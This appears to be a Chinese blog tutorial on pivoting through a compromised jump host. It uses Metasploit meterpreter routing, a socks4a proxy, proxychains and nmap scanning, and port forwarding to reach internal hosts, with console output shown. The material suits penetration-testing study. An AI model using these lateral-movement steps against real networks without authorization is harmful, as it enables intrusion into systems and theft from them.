最近,拿到一台内网机器, 苦于无法使用nmap扫描改主机的内网, 所以才有此文

  在跳板机子获取一定权限后,需要积极的向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经得到的meterpreter后门,可以使系列的操作更容易。

  使用Meterpreter 内置的添加路由功能

  获取路由信息

run get_local_subnets

  自动添加路由

run post/multi/manage/autoroute
/*
或者使用 run autoroute -s 10.0.0.0 -n 255.0.0.0
-s 参数为网关 -n 参数为只掩码
*/

  查看路由信息

run autoroute -p

  虽然路由表已经添加了, 但是我们直接ping 内网的主机是没法ping通的

  通过跳板使用NMAP

  为了实现nmap扫描,metasploit中的路由配置需要被激活,并且需要通过socks4代理进行流量转发。Metasploit中存在这样的模块满足需求。
  使用Metasploit中的socks4代理模块:

meterpreter > background
[*] Backgrounding session ...
msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options
Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT yes The port to listen on.
Auxiliary action:
Name Description
---- -----------
Proxy
msf auxiliary(socks4a) > set srvhost 192.168.1.11
srvhost => 192.168.1.11
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) > netstat -antp | grep
[*] exec: netstat -antp | grep
tcp 172.16.0.20: 0.0.0.0:* LISTEN /ruby
msf auxiliary(socks4a) >

  使用proxychains 代理转发

  使用GNU\Linux操作系统内置的ProxyChains工具,任何TCP连接都能通过TOR、SCOKS4、SOCKS、HTTP/HTTPS等代理方式进行转发。在这项隧道技术中,可以嵌套多层代理。除了提供匿名性以外,如跳板机这样的利用也能实现向隔离的内部网络导入流量。

  使用编辑器在文件/etc/proxychains.conf的最后一行加入socks4代理的配置信息。

--- snippet ---
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1
socks4 192.168.1.11

  通过proxychains执行nmap扫描是一个简单的操作。流量包会通过定义的代理端口被导入到目标网络.

root@kali:~# proxychains nmap -sT -sV -Pn -n -p22,,,, 192.168..199ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-12 04:17 EDT
|S-chain|-<>-192.168.1.11:-<><>-192.168.100.199:-<><>-OK
|S-chain|-<>-192.168.1.11:-<><>-192.168.100.199:-<><>-OK
|S-chain|-<>-192.168.1.11:-<><>-192.168.100.199:-<--timeout
|S-chain|-<>-192.168.1.11:-<><>-192.168.100.199:-<--timeout
|S-chain|-<>-192.168.1.11:-<><>-192.168.100.199:-<--timeout
|S-chain|-<>-192.168.1.11:-<><>-192.168.100.199:-<><>-OK
|S-chain|-<>-192.168.1.11:-<><>-192.168.100.199:-

  可以看到192.168.100.199开启了web服务, 我们直接在浏览器中配置firefox代理(192.168.1.11 1080), 直接访问web服务:

  

  端口重定向

  此前通过nmap和proxychains,我们已经发现192.168.100.99的主机时在TCP 80端口运行了web服务。为了能够访问这个服务,本地系统的2323端口应该被路由至192.168.100.99的80端口.

meterpreter > portfwd add -L 192.168.1.11 -l  -p  -r 192.168.100.99
[*] Local TCP relay created: 192.168.1.11: <-> 192.168.100.99:
meterpreter > portfwd Active Port Forwards
==================== Index Local Remote Direction
----- ----- ------ ---------
192.168.1.11: 192.168.100.99: Forward total active port forwards.

  总的来说很卡。。。

  参考

内网渗透随想                                  http://www.91ri.org/14390.html

通过双重跳板漫游隔离内网            https://xz.aliyun.com/t/249

最新文章

  1. 【腾讯优测干货分享】如何降低App的待机内存(四)——进阶:内存原理
  2. 从linux0.11中起动部分代码看汇编调用c语言函数
  3. jquery 获取元素在浏览器中的绝对位置
  4. 【转载】关于Alipay支付宝接口(Java版)
  5. Remote Desktop File Format
  6. 机器学习实战 - 读书笔记(13) - 利用PCA来简化数据
  7. 查询计划Hash和查询Hash
  8. linux install sublime_text3
  9. [转载]关于AutoCAD.NET的辅助方法
  10. &#39;vt100&#39;: unknown terminal type.
  11. hdu4374One hundred layer (DP+单调队列)
  12. ubuntu 下操作文件夹,出现Permission denied的解决的方法
  13. Web 版 powerdesigner (Canvas) 技术分享
  14. JavaEE 藏经阁
  15. Scala 按名称参数调用函数 与 =&gt;的用法
  16. nginx之fastcgi和PHP的PHP-FPM
  17. 大白话说Java泛型:入门、使用、原理
  18. text/html和text/plain的区别
  19. Windows 内核漏洞学习—空指针解引用
  20. linux tmux命令小结

热门文章

  1. [2019.05.09]Linux 学习笔记(3)
  2. JVM的底层实现原理
  3. HDU3605 Escape(最大流判满流 + 状压)
  4. No root/virtual joint specified in SRDF. Assuming fixed joint
  5. P1081 开车旅行[倍增](毒瘤题)
  6. DT系统应用-添加地图标注
  7. 【大数据】Windows7、Hadoop2.7.6
  8. Linux计划作业练习
  9. 通过100张图一步步理解CNN
  10. 论文画图工具使用(2)vision软件